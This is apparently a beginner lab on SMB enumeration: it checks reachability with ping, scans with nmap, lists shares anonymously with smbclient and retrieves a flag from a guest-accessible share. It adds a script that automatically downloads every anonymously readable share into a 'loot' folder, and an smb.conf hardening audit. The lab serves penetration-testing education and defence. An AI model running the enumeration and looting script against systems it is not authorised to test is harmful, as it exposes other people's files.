SMB Enumeration and Guest Access

Linux | Beginner

Introduction

Welcome to this hands-on lab focused on Server Message Block (SMB) enumeration and exploitation. SMB is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network. Due to its widespread use, it's a common target for attackers.

In this lab, you will step into the shoes of a penetration tester. You'll start with basic network reconnaissance to confirm the target is online. Next, you'll use the powerful scanning tool nmap to discover an open SMB service. Finally, you'll use smbclient to investigate the service, find a misconfiguration that allows anonymous guest access, and retrieve a hidden flag from a public share.

Upon completion, you will understand how to:

  • Verify network connectivity using ping.
  • Scan for open SMB ports and services using nmap.
  • Enumerate and connect to SMB shares using smbclient.
  • Exploit a guest access misconfiguration to retrieve files.

Let's begin.

Verify Connectivity to Target with Ping

In this first step, you'll perform a basic reconnaissance task: verifying that the target machine is online and reachable from your attacker machine. The ping command is the standard utility for this: it sends ICMP Echo Request packets to a host and reports any Echo Reply that comes back.

Your environment includes a target system aliased as target. To confirm connectivity, run the following command in your terminal to send four packets:

ping -c 4 target

The -c 4 flag tells ping to send exactly four packets and then stop. A successful result will look similar to the output below, showing replies from the target. The IP address and time values may differ.

PING target (172.17.0.2) 56(84) bytes of data.
64 bytes from target (172.17.0.2): icmp_seq=1 ttl=64 time=0.086 ms
64 bytes from target (172.17.0.2): icmp_seq=2 ttl=64 time=0.064 ms
64 bytes from target (172.17.0.2): icmp_seq=3 ttl=64 time=0.063 ms
64 bytes from target (172.17.0.2): icmp_seq=4 ttl=64 time=0.064 ms

--- target ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3069ms
rtt min/avg/max/mdev = 0.063/0.069/0.086/0.010 ms

Seeing "4 received, 0% packet loss" confirms that your machine can communicate with the target, setting the stage for the next phase of enumeration. Keep in mind that the reverse is not a safe conclusion: a host or firewall that drops ICMP shows 100% packet loss while SMB may still be listening, so on a real engagement a silent ping is a reason to scan anyway, not to stop.

Scan Open Ports with Nmap

In this step, you will use nmap (Network Mapper) to scan the target for open ports and identify running services. This is a critical step in finding potential attack vectors. We will focus our scan on the SMB service.

Execute the following nmap command to perform a service version detection scan (-sV) over nmap's default top 1,000 TCP ports and run the smb-protocols NSE script (--script), which asks the server which SMB dialects it is willing to negotiate:

nmap -sV --script smb-protocols target

After a few moments, nmap will report its findings. The output will look similar to this:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-19 10:31 CST
Nmap scan report for target (172.17.0.2)
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2

Host script results:
| smb-protocols:
|   dialects:
|     2.02
|     2.10
|     3.00
|     3.02
|_    3.11

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.40 seconds

The output confirms that ports 139/tcp and 445/tcp are open and running Samba. Port 139 carries SMB over the NetBIOS session service; port 445 carries SMB directly over TCP and is the port modern clients try first. The dialect list is also informative: it contains only SMB2 and SMB3 dialects (2.02 through 3.11) and no SMB1 (NT LM 0.12) entry, so SMB1-only tooling will not work against this host, which is echoed as "SMB1 disabled" in the smbclient output later. This discovery is our cue to investigate the SMB service for misconfigurations.

Connect to Target via SMB

In this step, you will use the smbclient utility to interact with the SMB service on the target. Your goal is to see whether you can connect without valid credentials. Two related misconfigurations make this possible: a "null session", where the server accepts an empty username and password, and guest access, where Samba maps an unknown username to its guest account (the map to guest = Bad User setting). The commands below exercise both.

First, let's list the shares the target advertises. The -L flag requests that list, and -N suppresses the password prompt and sends an empty password instead. Without -U, smbclient sends your local login name as the username; to force a true null session, add -U "%" (empty username and empty password).

Run the following command:

smbclient -L //target -N

If the server is misconfigured to allow guest access, you will see a list of available shares. The output should look similar to this:

        Sharename       Type      Comment
        ---------       ----      -------
        public          Disk
        IPC$            IPC       IPC Service (Samba Server)
SMB1 disabled -- no workgroup available

The key finding here is the public share. The name suggests it might be accessible to anyone. IPC$, by contrast, is the named-pipe endpoint present on every Samba and Windows server; it is what the -L listing itself talks to, not a file share, so it is not a finding on its own. In the next step, you will connect to the public share to explore its contents.

Explore Target System and Locate Flag

In this final step, you will connect to the public share you discovered and search for the flag. This simulates the post-exploitation phase, where an attacker searches for valuable data.

Connect directly to the public share using smbclient, again using the -N flag for anonymous access:

smbclient //target/public -N

A successful connection will drop you into an smbclient prompt, which looks like smb: \>. You are now browsing the remote file share.

Try "help" to get a list of possible commands.
smb: \>

Use the ls command to list the contents of the share:

ls

You should see the flag.txt file listed. In the attribute column, D marks a directory and N a normal file; the next column is the size in bytes (29 here).

smb: \> ls
  .                                   D        0  Fri Sep 19 10:29:39 2025
  ..                                  D        0  Fri Sep 19 10:29:39 2025
  flag.txt                            N       29  Fri Sep 19 10:29:39 2025

  40901312 blocks of size 1024. 22067688 blocks available

Now, download the file to your local machine using the get command:

get flag.txt

Note: smbclient has no built-in cat command to print a remote file. Its more command fetches a temporary copy and pipes it through your pager, but get is the right choice when you want to keep the file: it saves it under the same name in your current local directory (change that directory with lcd).

Once the download is complete, type exit to leave the smbclient session. Finally, use the cat command on your local terminal to display the contents of the downloaded flag.

cat flag.txt

The terminal will display the flag's value.

labex{smb_gu3st_acc3ss_fl4g}

Congratulations! You have successfully enumerated an SMB service, exploited a guest access misconfiguration, and retrieved the flag. Copy the flag value to complete the lab.
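The four steps above chained into one script, as an added example that is not part of the original lab: it checks reachability, scans for SMB, lists shares anonymously, and downloads every share that answers a credential-less ls. It assumes the lab's target alias (or any hostname passed as the first argument), that ping, nmap and smbclient are on the attacker machine's PATH, and an output directory named loot; the two sample outputs embedded for the parsers are constructed from the listings shown above.

```shell
#!/bin/sh
# Added example, not the lab's own code: the manual ping / nmap / smbclient
# steps as one script. Assumes ping, nmap and smbclient are installed and that
# the target is reachable as the hostname given in $1 (the lab's `target`).

# Print open TCP port numbers from an nmap text report read on stdin.
open_tcp_ports() {
    awk '/^[0-9]+\/tcp[[:space:]]+open/ { sub(/\/tcp$/, "", $1); print $1 }'
}

# Print Disk-type share names from `smbclient -L` output read on stdin.
# IPC$ (type IPC) is the named-pipe endpoint every server exposes, not a
# file share, so it is dropped along with printer queues.
disk_shares() {
    awk '
        /Sharename[[:space:]]+Type/ { table = 1; next }   # header row
        table && /^[[:space:]]*-+/  { next }              # underline row
        table && NF == 0            { table = 0 }         # blank line ends table
        table && $2 == "Disk"       { print $1 }
    '
}

# Return 0 if the share can be listed with an empty password, 1 otherwise.
anon_readable() {
    smbclient "//$1/$2" -N -c 'ls' >/dev/null 2>&1
}

# Full workflow against one host. Share names containing spaces are not
# handled by the for loop; the lab's shares do not have any.
enumerate_target() {
    target=$1
    outdir=${2:-loot}          # assumption: download directory

    if ! ping -c 1 -W 2 "$target" >/dev/null 2>&1; then
        echo "[-] $target did not answer ICMP; scanning anyway (ICMP may be filtered)" >&2
    fi

    ports=$(nmap -p 139,445 -sV --script smb-protocols "$target" | open_tcp_ports | tr '\n' ' ')
    case " $ports " in
        *" 445 "*|*" 139 "*) echo "[+] SMB listening on $target: $ports" ;;
        *) echo "[-] no SMB port open on $target" >&2; return 1 ;;
    esac

    for share in $(smbclient -L "//$target" -N 2>/dev/null | disk_shares); do
        if anon_readable "$target" "$share"; then
            echo "[+] //$target/$share is readable anonymously; saving to $outdir/$share"
            mkdir -p "$outdir/$share"
            # recurse ON + prompt OFF makes mget walk the whole tree without asking
            smbclient "//$target/$share" -N \
                -c "lcd $outdir/$share; recurse ON; prompt OFF; mget *"
        else
            echo "[ ] //$target/$share exists but rejects anonymous access"
        fi
    done
}

# Constructed sample outputs (abridged from the listings in the lab text) so
# the parsers can be exercised without a live target.
SAMPLE_NMAP='Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2'

SAMPLE_SMB_LIST='        Sharename       Type      Comment
        ---------       ----      -------
        public          Disk
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba Server)
SMB1 disabled -- no workgroup available'

# Run the live workflow only when a target is given, e.g. `sh smb_enum.sh target`
if [ "$#" -ge 1 ]; then
    enumerate_target "$@"
fi
```

Run it as sh smb_enum.sh target and the downloaded files land under loot/public/. The parsers are deliberately separate functions so they can be checked against saved output; note that print$ is kept because it is a Disk-type share, and hidden ($-suffixed) shares are exactly the kind of place data is left behind.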

Summary

In this lab, you successfully completed a basic penetration test workflow against a misconfigured SMB service. You learned and practiced how to:

  • Use ping to verify network connectivity with a target.
  • Employ nmap to scan for open ports and identify the SMB service.
  • Use smbclient -L to enumerate available network shares anonymously.
  • Connect to an open SMB share with smbclient using a null session.
  • Navigate a remote share and download files using ls and get.

This exercise demonstrates a common and critical weakness: allowing anonymous or guest access to network shares. Such misconfigurations can lead to sensitive data exposure. On the Samba side the fix lives in smb.conf: keep map to guest = Never in [global], set guest ok = no on every share that holds data (and name who may use it with valid users), and consider restrict anonymous = 2 to limit what an unauthenticated client can do over IPC$. By understanding how to find and exploit these weaknesses, you are better prepared to secure your own systems against them.
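To turn the finding into a fix, here is an added example (not the lab's material) in the same shell used throughout: two constructed smb.conf fragments, the weak one that produces the guest access exploited above and a hardened one, plus a small audit function that flags the settings responsible. The share name public, its path and the group smbusers are assumptions.

```shell
#!/bin/sh
# Added example, not part of the lab: audit an smb.conf for the settings that
# grant anonymous/guest read access, with a weak and a hardened fragment to
# run it against. Both fragments are constructed; the share path and the
# group `smbusers` are assumptions.

# Weak configuration: unknown users are mapped to the guest account and the
# share allows guests, which is exactly what `smbclient -N` walked into.
WEAK_CONF='[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[public]
   path = /srv/samba/public
   guest ok = yes
   read only = yes'

# Hardened configuration: unknown users are rejected (the Samba default),
# the share needs a listed account, and anonymous use of IPC$ is curtailed.
HARDENED_CONF='[global]
   workgroup = WORKGROUP
   map to guest = Never
   restrict anonymous = 2

[public]
   path = /srv/samba/public
   guest ok = no
   valid users = @smbusers
   read only = yes'

# Read an smb.conf on stdin, print one line per guest-related weakness and
# return 1 if any were found, 0 if the file is clean. Keys and values are
# compared case-insensitively, as Samba does; "public = yes" is Samba's
# documented synonym for "guest ok = yes".
audit_guest_settings() {
    awk '
        function norm(s) {
            sub(/^[ \t]+/, "", s); sub(/[ \t]+$/, "", s); return tolower(s)
        }
        /^[ \t]*[;#]/ { next }                                                # comment line
        /^[ \t]*\[/   { s = norm($0); section = substr(s, 2, length(s) - 2); next }
        index($0, "=") {
            split($0, kv, "="); key = norm(kv[1]); val = norm(kv[2])
            if (section == "global" && key == "map to guest" && val != "never") {
                print "[global] map to guest = " val ": unknown users are treated as guest"; bad++
            }
            if (section != "global" && (key == "guest ok" || key == "public") && val == "yes") {
                print "[" section "] " key " = yes: share readable without credentials"; bad++
            }
            if (section != "global" && key == "guest only" && val == "yes") {
                print "[" section "] guest only = yes: all access forced to guest"; bad++
            }
        }
        END { exit (bad > 0) }
    '
}

# Audit a real file when a path is given, e.g. `sh smb_audit.sh /etc/samba/smb.conf`
if [ "$#" -ge 1 ]; then
    audit_guest_settings < "$1"
fi
```

Against WEAK_CONF the audit reports the map to guest line and the guest ok line and exits 1; against HARDENED_CONF it prints nothing and exits 0. After changing a real /etc/samba/smb.conf, validate it with testparm -s, reload with smbcontrol smbd reload-config, and repeat the smbclient -L //target -N check from the lab, which should now be refused.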